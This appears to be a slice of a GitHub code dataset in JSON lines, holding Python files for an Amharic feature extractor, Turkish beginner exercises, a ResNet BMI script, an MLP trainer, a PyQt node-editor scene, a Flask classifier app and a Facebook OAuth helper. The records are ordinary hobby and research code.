group:\n\t\t\t\t\tw.write('1;')\n\t\t\t\telse:\n\t\t\t\t\tw.write('0;')\n\n\t\t\t# check plural for nouns\n\t\t\tif len(word) >= 2 and ((word[-1] == u'ች' or word[-1] == u'ቹ') and word[-2] in vowel_o):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check a definite article\n\t\t\tif len(word) >= 2 and (word[-1] == u'ው' or word[-1] == u'ዋ' or word[-1] in vowel_u or word[-1] == u'ቱ'):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and (word[-2:] == u'ዮዋ' or word[-2:] == u'ዮው'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check possessive prefix\n\t\t\tif len(word) >= 2 and word[0] == u'የ':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check double vowels\n\t\t\tcount = 0\n\t\t\tif len(word) >= 4:\n\t\t\t\tfor i in range(0, len(word) - 1):\n\t\t\t\t\tif word[i] == word[i + 1]:\n\t\t\t\t\t\tw.write('1;')\n\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\tbreak\n\t\t\t\tif count == 0:\n\t\t\t\t\tw.write('0;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check possessive suffix\n\t\t\tif len(word) >= 4:\n\t\t\t\tif word[-1] in vowel_e or word[-1] in vowel_u or word[-1] == u'ው':\n\t\t\t\t\tw.write('1;')\n\t\t\t\telif word[-1] == u'ህ' or word[-1] == u'ህ' or word[-1] == u'ዎ' or word[-1] == u'ዋ':\n\t\t\t\t\tw.write('1;')\n\t\t\t\telif word[-3] in vowel_a and (word[-2:] == u'ቸው' or word[-2:] == u'ችን' or word[-2:] == u'ቸሁ'):\n\t\t\t\t\tw.write('1;')\n\t\t\t\telse:\n\t\t\t\t\tw.write('0;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check verbal past\n\t\t\tif len(word) >= 3 
and word[-2] in consonants and (word[-1] == u'ህ' or word[-1] == u'ክ' or word[-1] == u'ሁ'or word[-1] == u'ኩ' or word[-1] == u'ሽ'):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 2 and word[-1] in vowel_u:\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 2 and word[-1] in vowel_ae:\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and (word[-2] in vowel_ae and word[-1] == u'ች'):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 4 and word[-3:] == u'አችሀ':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check accusative\n\t\t\tif len(word) >= 2 and word[-1] == u'ን':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check prepositions\n\t\t\tif len(word) >= 2 and (word[0] == u'በ' or word[0] == u'ባ' or word[0] == u'ከ' or word[0] == u'ካ' or word[0] == u'እ' or word[0] == u'ለ' or word[0] == u'ስ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check object pronoun suffix\n\t\t\tobject_suffixes = [u'ኝ', u'ህ', u'ሽ', u'ው', u'ን']\n\t\t\tif len(word) >=2 and word[-1] in object_suffixes:\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >=3 and word[-2:] == u'ዎት':\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >=3 and word[-2] in vowel_a and word[-1] == u'ት':\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >=4 and word[-3] in vowel_a and (word[-2:] == u'ቸው' or word[-2:] == u'ችሁ' or word[-2:] == u'ቸው' or word[-2:] == u'ችሁ'):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >=3 and word[-1] == u'ት' and word[-2] in vowel_u:\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check verbal negation\n\t\t\tif len(word) >= 3 and (word[-1] == u'ም' or word[0] == u'አ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check prefix of verbal present-future stem\n\t\t\tif len(word) >= 3 and (word[0] == u'እ' or word[0] == u'ች' or word[0] == u'ይ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check verbal present-future form\n\t\t\tif len(word) >= 4 and word[-3] in vowel_a and (word[-2:] == u'ለሁ' or word[-2:] == u'ለህ' or word[-2:] == u'ለሽ' or word[-2:] == u'ለች' or word[-2:] == u'ለን' or word[-2:] == u'ችሁ'):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and word[-2] in vowel_a and (word[-1] == u'ሉ' or word[-1] == u'ል'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check question pronoun\n\t\t\tif word in quest_pronouns:\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and ((word[-2] == u'ኛ' and (word[-1] == u'ው' or word[-1] == u'ዋ' or word[-1] in vowel_u)) or (word[-1] == u'ም' and (word[-2] == u'ው' or word[-2] == u'ዋ' or word[-2] in vowel_u))):\n\t\t\t\ttry_word = word[:-2]\n\t\t\t\tif try_word in quest_pronouns:\n\t\t\t\t\tw.write('1;')\n\t\t\t\telse:\n\t\t\t\t\tw.write('0;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check infinitive\n\t\t\tif len(word) >= 2 and word[0] == u'መ':\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 2 and word[-1] == u'ት':\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 4 and word[:3] == u'አለመ':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check passive voice\n\t\t\tif len(word) >= 2 and word[0] == u'ተ':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check place or instrument noun\n\t\t\tmiddle_tongue_a = [u'ቻ', u'ጃ', u'ጫ', u'ኻ', u'ዣ', u'ኛ', u'ያ']\n\t\t\tif len(word) >= 2 and word[-1] in middle_tongue_a:\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check actor noun\n\t\t\tmiddle_tongue = [u'ች', u'ኝ', u'ዥ', u'ጭ', u'ጅ', u'ኽ', u'ይ']\n\t\t\tfront_tongue_i = [u'ቲ', u'ዲ', u'ጢ', 
u'ሲ', u'ዚ', u'ኪ', u'ሊ']\n\t\t\tif len(word) >= 2 and (word[-1] in middle_tongue or (word[-1] in vowel_i and word[-1] not in front_tongue_i)):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check causative voice\n\t\t\tif len(word) >= 2 and word[0] == u'አ':\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check attributive form of a verb\n\t\t\tif len(word) >= 3 and (word[0] == u'የ' or word[:2] == u'የም' or word[:2] == u'ያል'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check purpose of an action\n\t\t\tif len(word) >= 2 and (word[0] == u'ሌ' or word[0] == u'ለ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check adverbial participle\n\t\t\tif len(word) >= 3 and (word[-1] in vowel_e or word[-1] in vowel_a or word[-1] in vowel_o or ((word[-1] == u'ህ' or word[-1] == u'ሽ' or word[-1] == u'ሽ') and word[-2] in vowel_ae)):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 4 and ((word[-2:] == u'ችሁ' and word[-3] in vowel_a) or (word[-2] in vowel_o and word[-1] == u'ው')):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and word[:2] == u'በመ':\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and (word[:2] == u'እየ' and (word[-1] == u'ሁ' or word[-1] == u'ህ' or word[-1] == u'ሽ' or word[-1] in vowel_ae or word[-1] in vowel_u)):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 4 and (word[:2] == u'እየ' and ((word[-2:] == u'ችሁ' and word[-3] in vowel_a) or (word[-1] == u'ች' and word[-2] in vowel_ae) or (word[-1] == u'ን' and word[-2] in consonants))):\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 3 and (word[:2] == u'ስት' or word[:2] == u'ስን' or word[0] == u'ሲ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\tif word[-1] == u'ም':\n\t\t\t\tif len(word) >= 4 and (word[-2] in vowel_e or word[-2] in vowel_a or word[-2] in vowel_o or ((word[-2] == u'ህ' or word[-2] == u'ሽ' or word[-2] == u'ሽ') and word[-3] in vowel_ae)):\n\t\t\t\t\tw.write('1;')\n\t\t\t\telif len(word) >= 5 and ((word[-3:] == u'ችሁ' and word[-4] in vowel_a) or (word[-3] in vowel_o and word[-2] == u'ው')):\n\t\t\t\t\tw.write('1;')\n\t\t\t\telif len(word) >= 4 and (word[:2] == u'እየ' and (word[-2] == u'ሁ' or word[-2] == u'ህ' or word[-2] == u'ሽ' or word[-2] in vowel_ae or word[-2] in vowel_u)):\n\t\t\t\t\tw.write('1;')\n\t\t\t\telif len(word) >= 5 and (word[:2] == u'እየ' and ((word[-3:] == u'ችሁ' and word[-4] in vowel_a) or (word[-2] == u'ች' and word[-2] in vowel_ae) or (word[-2] == u'ን' and word[-3] in consonants))):\n\t\t\t\t\tw.write('1;')\n\t\t\t\telse:\n\t\t\t\t\tw.write('0;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check analytic form\n\t\t\tif u'አለሁ' in word or u'አለች' in word or u'አል' in word:\n\t\t\t\tw.write('1;')\n\t\t\telif len(word) >= 4 and (((word[-2:] == u'ለሁ' or word[-2:] == u'ለች') and word[-3] in vowel_a) or (word[-1] == u'ል' and word[-2] in vowel_a)):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check order\n\t\t\tif len(word) >= 2 and (word[-1] in consonants or word[-1] in vowel_i or word[-1] in vowel_u):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check wish\n\t\t\tif len(word) >= 4 and (word[-1] in consonants or word[-1] in vowel_u) and (word[0] == u'ል' or word[0] == u'ይ' or word[0] == u'ት' or word[:2] == u'እን'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check subordinate of clause\n\t\t\tif len(word) >= 3 and (word[:2] == u'ስለ' or word[:3] == u'ስለም'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check noun 
suffix\n\t\t\tif len(word) >= 3 and ((word[-1] == u'ኛ' and (word[-2] in vowel_ae or word[-2] in consonants)) or ((word[-2:] == u'ነት' or word[-1] == u'ታ') and word[-2] in consonants)):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check noun/adjective prefix\n\t\t\tif len(word) >= 3 and (word[:2] == u'ባለ' or word[:2] == u'ሰረ'):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check adjective suffix\n\t\t\tif len(word) >= 3 and (((word[-1] == u'ም' or word[-1] == u'ማ' or word[-1] == u'ዊ') and word[-2] in vowel_a) or (word[-1] == u'ኛ' and (word[-2] in vowel_ae or word[-2] in consonants))):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check adverb prefix\n\t\t\tif len(word) >= 2 and (word[0] == u'በ' or word[0] == u'ለ' or word[:3] == u'እንደ' or word[:3] == u'በስተ' or word[:2] == u'ያለ' or word[:2] == u'በየ' or word[:3] == u'እስከ' or word[:3] == u'ከዎደ'):\n\t\t\t\tw.write('1')\n\t\t\telse:\n\t\t\t\tw.write('0')\n\n\t\t\tw.write('\\n')\n\t\t\tnumb_word += 1\n\t\t\tthreshold += 1\n\t\tnumb_sent += 1\n\t\twhole_words += numb_word\n\tw.close()\n\treturn feat_name, freq_dictionary, words_out, numb_sent, whole_words\n\n\n\n","repo_name":"maobedkova/AmharicCorpus","sub_path":"pos-tagger/features_extractor_3.py","file_name":"features_extractor_3.py","file_ext":"py","file_size_in_byte":14231,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"91"}
+{"seq_id":"1412053478","text":"import seaborn as sns\n\n# Görev 1: Verilen değerlerin veri yapılarını inceleyiniz.\n\n\nx = 8\ny = 3.2\nz = 8j + 18\na = \"hello world\"\nb = True\nc = 23 < 22\nl = [1,2,3,4]\nd = {\"Name\":\"Jake\",\n \"Age\":27,\n \"Adress\":\"Downtown\"}\nt = (\"Machine Learning\",\"Data Science\")\ns = {\"Python\",\"Machine Learning\",\"Data Science\"}\n\nprint(type(x), type(y), type(z), type(a), type(b), type(c), type(l), type(d), type(t), type(s))\n\n\n# Görev 2: Verilen string ifadenin tüm harflerini büyük harfe çeviriniz.\n# Virgül ve nokta yerine space koyunuz, kelime kelime ayırınız\n\ntext = \"The goal is to turn data into information, and information into insight.\"\n\nTEXT = text.upper()\nprint(TEXT)\n\nTEXT = TEXT.replace(\",\",\"\")\nTEXT = TEXT.replace(\".\",\"\")\nTEXT = TEXT.split(\" \")\nprint(TEXT)\n\n\n# Görev 3: Verilen listeye aşağıdaki adımları uygulayınız.\n# Adım1: Verilen listenin eleman sayısına bakınız.\n# Adım2: Sıfırıncı ve onuncu indeksteki elemanları çağırınız.\n# Adım3: Verilen liste üzerinden [\"D\", \"A\", \"T\", \"A\"] listesi oluşturunuz.\n# Adım4: Sekizinci indeksteki elemanı siliniz.\n# Adım5: Yeni bir eleman ekleyiniz.\n# Adım6: Sekizinci indekse \"N\" elemanını tekrar ekleyiniz.\n\nlst = [\"D\",\"A\",\"T\",\"A\",\"S\",\"C\",\"I\",\"E\",\"N\",\"C\",\"E\"]\n\nprint(len(lst))\n\nprint(lst[0],lst[10])\n\ndata = lst[0:4]\n\nprint(data, type(data))\n\nlst.pop(8)\n\nprint(lst)\n\nlst.append(\"P\")\nprint(lst)\n\nlst.insert(8,\"Y\")\nprint(lst)\n\n# Görev 4: Verilen sözlük yapısına aşağıdaki adımları uygulayınız.\n# Adım1: Key değerlerine erişiniz.\n# Adım2: Value'lara erişiniz.\n# Adım3: Daisy key'ine ait 12 değerini 13 olarak güncelleyiniz.\n# Adım4: Key değeri Ahmet value değeri [Turkey,24] olan yeni bir değer ekleyiniz.\n# Adım5: Antonio'yu dictionary'den siliniz.\n\ndict = {\"Christian\": [\"America\", 18],\n \"Daisy\": [\"England\", 12],\n \"Antonio\": [\"Spain\", 22],\n \"Dante\": [\"Italy\", 25]}\n\nprint(dict.keys())\n\nprint(dict.values())\n\ndict[\"Daisy\"][1] = 13\nprint(dict[\"Daisy\"][1] )\n\ndict[\"Ahmet\"] = [\"Turkey\",24]\n\nprint(dict)\n\ndict.pop(\"Antonio\")\n\nprint(dict)\n\n\n\n# Görev 5:Argüman olarak bir liste alan, listenin içerisindeki tek ve çift sayıları ayrı listelere atayan\n# ve bu listeleri return eden fonksiyon yazınız\n\nnum = [1,2,3,4,5,6,7,8,9,10]\ntek = []\ncift = []\n\ndef sayi (liste):\n\n for i in range(len(liste)):\n if liste[i]%2==0:\n cift.append(liste[i])\n\n else:\n tek.append(liste[i])\n\n return cift,tek\n\n\n# Aynı çıktıyı list comprehension ile uygulamak\n\ntek_1 = [i for i in range(len(num)) if not i%2==0]\n\ncift_1 = [i for i in range(len(num)) if i%2==0]\n\nprint(tek_1,\"\\t\",cift_1)\n\n\n# Görev 6: List Comprehension yapısı kullanarak car_crashes verisindeki numeric değişkenlerin isimlerini\n# büyük harfe çeviriniz ve başına NUM ekleyiniz\n\ndf = sns.load_dataset(\"car_crashes\")\n\nprint(df.columns)\n\na = [col.upper() for col in df.columns]\n\nprint(a)\n\n# Görev 7: List Comprehension yapısı kullanarak car_crashes verisinde isminde \"no\" barındırmayan değişkenlerin\n# isimlerinin sonuna \"FLAG\" yazınız\n\nb = [i if \"NO\" in i else i+\"_FLAG\" for i in a]\n\nprint(b)\n\n# Görev 8: List Comprehension yapısı kullanarak aşağıda verilen değişken isimlerinden\n# FARKLI olan değişkenlerin isimlerini seçiniz ve yeni bir dataframe oluşturunuz\n\nog_list = [\"abbrev\",\"no_previous\"]\n\nnew_cols = [i for i in df.columns if not i==og_list[0] or i==og_list[1]]\n\nprint(new_cols)\n\nnew_df = 
df[new_cols]\n\nprint(new_df.head())","repo_name":"vyscnktn/data_science_and_machine_learning_bootcamp","sub_path":"python-alistirmalari.py","file_name":"python-alistirmalari.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
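For the numeric-column selection in Task 6 above, pandas also offers select_dtypes, which avoids comparing each column's dtype by hand; a sketch of that alternative:

import seaborn as sns

df = sns.load_dataset("car_crashes")
# select_dtypes(include="number") yields only the numeric columns
num_cols = ["NUM_" + c.upper() for c in df.select_dtypes(include="number").columns]
print(num_cols)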
+{"seq_id":"901555960","text":"import os\n\nfrom torchvision.models import resnet50, ResNet50_Weights\nfrom torchvision.io import read_image, image\nimport cv2\n# Using pretrained weights:\nresnet50(weights=ResNet50_Weights.IMAGENET1K_V1)\n\n# Initialize the Weight Transforms\nweights = ResNet50_Weights.DEFAULT\npreprocess = weights.transforms()\n# Initialize model\nweights = ResNet50_Weights.DEFAULT\nmodel = resnet50(weights=weights)\n\n# Set model to eval mode\nmodel.eval()\n\nimgs_path = \"/home/nata/Documents/melissa\"\nimgs = os.listdir(imgs_path)\ni = 0\nfor filename in imgs:\n # if i == 10:\n # break\n try:\n filename = filename.replace(\"__\", \"_\")\n a = filename.split(\"_\")\n # height = float(a[3]) / 39.37\n # weight = float(a[2]) / 2.205\n # bmi = weight / (height**2)\n bmi = 43.3\n except:\n print(f\"smth wrong with img split. filename = {filename}\")\n continue\n\n try:\n img = read_image(imgs_path + \"/\" + filename, mode=image.ImageReadMode.RGB)\n img_transformed = preprocess(img)\n batch = preprocess(img).unsqueeze(0)\n prediction = model(batch).squeeze(0)\n except:\n print(f\"smth wrong with prediction. Index = {i}, filename = {filename}\")\n continue\n\n\n try:\n with open(\"/home/nata/pythonProj/STRAPS/resnet_melissa.csv\", \"a\") as file:\n a_list = prediction.tolist()\n pred_str = \",\".join(map(str, a_list))\n file.write(filename + \",\" + str(bmi) + \",\" + pred_str)\n file.write(\"\\n\")\n except:\n print(f\"smth wrong with result write. filename = {filename}\")\n continue\n\n i += 1\n\nprint(\"result images = \", i)\n\n# img_path = \"/home/nata/pythonProj/STRAPS-3DHumanShapePose/demo/0001.png\"\n# Apply it to the input image\n\n\n\n\n# prediction = model(batch).squeeze(0).softmax(0)\n# print(\"prediction softmax = \", prediction)\n\n# print(\"------------------------------------\")\n# prediction = model(batch)\n# print(\"prediction = \", prediction)\n# class_id = prediction.argmax().item()\n# score = prediction[class_id].item()\n# category_name = weights.meta[\"categories\"][class_id]\n# print(f\"{category_name}: {100 * score}%\")\n\n# pred = model.forward(img_transformed)\n# print(pred)","repo_name":"naruru-sv/BMI_estimation","sub_path":"resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"42956784692","text":"import torch\nfrom torch import nn\nimport wandb\n\nfrom models import MLP\nfrom utils import acc, load_fashion_mnist\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef get_config():\n cfg = dict(\n epochs=15,\n batch_size=1024,\n\n hid_dim=512,\n n_hid_layers=5,\n nonlinearity='tanh',\n bias=True, \n\n opt='adam',\n learning_rate=0.001\n\n )\n \n return cfg\n\ndef get_nonlinearity(cfg):\n if cfg.nonlinearity == 'tanh':\n return torch.tanh\n if cfg.nonlinearity == 'relu':\n return torch.relu\n if cfg.nonlinearity == 'softplus':\n return nn.functional.softplus\n\ndef build_optimizer(cfg, params):\n # K-FAC https://github.com/Thrandis/EKFAC-pytorch/blob/master/kfac.py\n # Shampoo: https://github.com/facebookresearch/optimizers/tree/main/shampoo\n \n if cfg['opt'] == 'adam':\n optimizer = torch.optim.Adam(\n params,\n lr=cfg['learning_rate'],\n )\n\n elif cfg['opt'] == 'sgd':\n optimizer = torch.optim.SGD(\n params,\n lr=cfg['learning_rate'],\n )\n\n elif cfg['opt'] == 'rmsprop':\n optimizer = torch.optim.RMSprop(\n params,\n lr=cfg['learning_rate'],\n )\n\n\n return optimizer\n\ndef train_epoch(model, optimizer, dataloader, criterion):\n runnig_loss = 0\n running_acc = 0 \n for X, y in dataloader:\n optimizer.zero_grad()\n\n X, y = X.to(device), y.to(device)\n\n y_pred = model(X)\n loss = criterion(y_pred, y)\n\n loss.backward()\n optimizer.step()\n\n wandb.log({'train_loss': loss.item()})\n runnig_loss += loss.item() \n running_acc += acc(y_pred, y)\n\n return dict(\n train_loss=runnig_loss/len(dataloader),\n train_acc=running_acc/len(dataloader)\n )\n\ndef main():\n wandb.init(config=get_config(), project='LocoProp')\n cfg = wandb.config\n\n data = load_fashion_mnist(batch_size=cfg.batch_size)\n model = MLP(\n in_dim=data['dim'], hid_dim=cfg.hid_dim, out_dim=data['num_classes'], \n n_hid_layers=cfg.n_hid_layers, nonlinearity=get_nonlinearity(cfg), bias=cfg.bias\n ).to(device)\n optimizer = build_optimizer(cfg, model.parameters())\n criterion = nn.CrossEntropyLoss()\n\n for _ in range(cfg.epochs):\n metrics = train_epoch(model, optimizer, data['trainloader'], criterion)\n print(metrics)\n\nif __name__ == \"__main__\":\n main()","repo_name":"richardcepka/LocoProp","sub_path":"baseline_run.py","file_name":"baseline_run.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"16700525827","text":"from PyQt5.QtWidgets import QGraphicsScene\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import QColor, QPen\nimport math\n\n\nclass QDMGraphicsScene(QGraphicsScene):\n def __init__(self, scene, parent=None):\n super().__init__(parent)\n\n self.scene = scene\n # Settings\n self._color_background = QColor('#393939')\n self._color_light = QColor('#2f2f2f')\n self._color_dark = QColor(\"#292929\")\n\n self.gridSize = 20\n self.gridSquares = 5\n\n self._pen_light = QPen(self._color_light)\n self._pen_light.setWidth(1)\n self._pen_dark = QPen(self._color_dark)\n self._pen_dark.setWidth(2)\n\n # Brackground\n self.setBackgroundBrush(self._color_background)\n\n def setGrScene(self, width, height):\n self.setSceneRect(-width // 2, -height // 2, width, height)\n\n def drawBackground(self, painter, rectangle):\n super().drawBackground(painter, rectangle)\n # Creating the grid\n left = int(math.floor(rectangle.left()))\n right = int(math.ceil(rectangle.right()))\n top = int(math.floor(rectangle.top()))\n bottom = int(math.ceil(rectangle.bottom()))\n\n first_left = left - (left % self.gridSize)\n first_top = top - (top % self.gridSize)\n\n # Computing the lines to be drawn\n lines_light = []\n lines_dark = []\n for x_line in range(first_left, right, self.gridSize):\n if x_line % (self.gridSize * self.gridSquares) != 0:\n lines_light.append(QLine(x_line, top, x_line, bottom))\n else:\n lines_dark.append(QLine(x_line, top, x_line, bottom))\n for v_line in range(first_top, bottom, self.gridSize):\n if v_line % (self.gridSize * self.gridSquares) != 0:\n lines_light.append(QLine(left, v_line, right, v_line))\n else:\n lines_dark.append(QLine(left, v_line, right, v_line))\n\n # Draw the lines\n painter.setPen(self._pen_light)\n painter.drawLines(*lines_light)\n\n painter.setPen(self._pen_dark)\n painter.drawLines(*lines_dark)\n","repo_name":"cubicalia/Node_Editor","sub_path":"ui/scenes/node_graphics_scene.py","file_name":"node_graphics_scene.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"75191027823","text":"from flask import Flask, render_template, request\nimport os\nimport joblib\nfrom dotenv import load_dotenv\n\napp = Flask(__name__)\nload_dotenv()\n\nmodel = joblib.load('classifier.joblib')\n\n# Define dictionaries for dropdown options\nindustries = {\n 'None': None,\n 'Horizontal': 16,\n 'Healthcare': 15,\n 'Legal': 17,\n 'Energy, Gas, Oil, Utilities': 10,\n 'Construction': 7,\n 'Entertainment, Hospitality, Travel': 11,\n 'Retail': 23,\n 'Real Estate & Property Mgt.': 22,\n 'Financial Services': 12,\n 'Education': 9,\n 'Automotive': 1,\n 'Sports and Fitness': 24,\n 'Food': 13,\n 'Logistics, Supply Chain, Transportation': 18,\n 'CPG': 4,\n 'Agriculture': 0,\n 'Non-Profit': 20,\n 'Manufacturing': 19,\n 'Cannabis': 5,\n 'Government': 14,\n 'Aviation': 2,\n 'Real Estate': 21,\n 'BioTech': 3,\n 'Cryptocurrency': 8,\n 'Clinical': 6\n}\n\ncategories = {\n 'None': None,\n 'On-Demand Services': 16,\n 'Communications': 7,\n 'Analytics and BI': 2,\n 'Business Mgt and ERP': 4,\n 'Compliance': 8,\n 'Practice Management': 18,\n 'Sales and Marketing': 20,\n 'Logistics and Supply Chain': 14,\n 'IT Mgt': 13,\n 'Accounting and Finance': 1,\n 'Ecommerce': 11,\n 'Document Management': 10,\n 'HR and Recruiting': 12,\n 'Cybersecurity': 9,\n 'Cloud and Software Dev Tools': 6,\n 'Point of Sale': 17,\n 'Marketplace': 15,\n 'Automation': 3,\n 'Clinical': 5,\n 'eLearning': 24,\n 'AI and Machine Learning': 0,\n 'Virtual Reality': 22,\n 'Student Mgt': 21,\n 'Practice Mgt': 19,\n 'eCommerce': 23\n}\n\nc3_options = {\n 'None': None,\n 'B2B SaaS': 0,\n 'B2G': 1\n}\n\nc4_options = {\n 'None': None,\n 'Self-funded': 7,\n 'VC-funded': 8,\n 'Angel or Seed Funding': 1,\n 'Acquired': 0,\n 'Public': 6,\n 'Private Equity funding': 5,\n 'Other': 3,\n 'Angel or Seed funding': 2,\n 'Private Equity Funding': 4\n}\n\nc5_options = {\n 'None': None,\n 'Small': 0,\n 'Startup': 1,\n 'Large': 2,\n 'Medium': 3\n}\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n selected_industry = 'None'\n selected_category = 'None'\n selected_c3 = 'None'\n selected_c4 = 'None'\n selected_c5 = 'None'\n result = ''\n\n if request.method == \"POST\":\n selected_industry = request.form.get(\"industry\")\n selected_category = request.form.get(\"category\")\n selected_c3 = request.form.get('three')\n selected_c4 = request.form.get('four')\n selected_c5 = request.form.get('five')\n input_data = [\n industries[selected_industry],\n categories[selected_category],\n c3_options[selected_c3],\n c4_options[selected_c4],\n c5_options[selected_c5]\n ]\n prediction = model.predict([input_data])\n result = 'Can trust' if prediction[0] else \"Can't be trusted\"\n\n return render_template(\n \"index.html\",\n industries=industries.keys(),\n categories=categories.keys(),\n c3_options=c3_options.keys(),\n c4_options=c4_options.keys(),\n c5_options=c5_options.keys(),\n selected_industry=selected_industry,\n selected_category=selected_category,\n selected_c3=selected_c3,\n selected_c4=selected_c4,\n selected_c5=selected_c5,\n result=result\n )\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=os.environ.get('PORT'), debug=True)\n","repo_name":"Vishallas/customer-trust-rel-modle","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"40111582292","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.conf import settings\nfrom django.contrib.auth import authenticate, login\nimport json\nimport urllib\nimport urllib2\nimport urlparse\nfrom urllib2 import HTTPError\n\ndef get_user_access_token(request):\n\thost_url = request.get_host()\n\tredirect_url = \"http://\" + host_url + request.path\n\tpage_url = \"https://graph.facebook.com/v2.3/oauth/access_token\"\n\tquery_data = {\n\t\t\"client_id\": settings.FACEBOOK_APP_ID,\n\t\t\"redirect_uri\": redirect_url,\n\t\t\"client_secret\": settings.FACEBOOK_APP_SECRET,\n\t\t\"code\": request.GET[\"code\"]\n\t}\n\t# We create a request with data which will result in a POST\n\treq = urllib2.Request(page_url, urllib.urlencode(query_data))\n\taccess_token_response = urllib2.urlopen(req)\n\taccess_token_json = access_token_response.read()\n\taccess_token_data = json.loads(access_token_json)\n\t#print(access_token_data)\n\t#print(\"aquired user access token\")\n\t#print(user_access_token[\"access_token\"])\n\n\treturn access_token_data[\"access_token\"]\n\ndef get_app_access_token():\n\tpage_url = \"https://graph.facebook.com/oauth/access_token\"\n\tquery_data = {\n\t\t\"client_id\": settings.FACEBOOK_APP_ID,\n\t\t\"client_secret\": settings.FACEBOOK_APP_SECRET,\n\t\t\"grant_type\": \"client_credentials\"\n\t}\n\t# We create a request with data which will result in a POST\n\treq = urllib2.Request(page_url, urllib.urlencode(query_data))\n\taccess_token_response = urllib2.urlopen(req)\t\n\taccess_token_json = access_token_response.read()\n\t#access_token_data = dict(urlparse.parse_qsl(access_token_qs))\n\taccess_token_data = json.loads(access_token_json)\n\t#print(app_access_token)\n\t#print(\"aquired app access token\")\n\t#print(app_access_token[\"access_token\"])\n\t\n\treturn 